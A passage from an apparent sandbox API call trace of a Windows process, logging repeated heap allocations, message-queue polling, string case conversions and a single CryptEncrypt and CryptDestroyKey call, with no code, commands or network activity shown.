Size=0x18) returned 0x2466dd0 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.767] CharLowerBuffW (in: lpsz="byte[23920]", cchLength=0xb | out: lpsz="byte[23920]") returned 0xb [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.769] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.769] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.770] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e3548*, pdwDataLen=0x8bef68*=0x5d6d, dwBufLen=0x5d70 | out: pbData=0x24e3548*, pdwDataLen=0x8bef68*=0x5d70) returned 1 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0165.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.772] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.772] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.773] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.773] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.773] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.774] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.774] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.774] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.774] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.774] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.774] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.774] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.782] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0165.782] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.784] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0165.784] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.784] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.785] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.785] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.785] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.785] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.785] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.786] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.786] RtlAllocateHeap 